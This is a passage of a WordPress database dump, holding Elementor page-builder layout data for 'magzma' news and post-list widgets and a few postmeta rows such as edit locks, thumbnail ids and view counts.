8},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1135,415,'_elementor_version','0.4'),(1136,415,'_elementor_css','a:3:{s:4:\"time\";i:1508855243;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1137,416,'_edit_last','1'),(1138,416,'_edit_lock','1509464208:1'),(1141,416,'_thumbnail_id','655'),(1142,416,'_wp_page_template','default'),(1146,416,'post_views_count','1290'),(1149,419,'_elementor_edit_mode','builder'),(1150,419,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horiz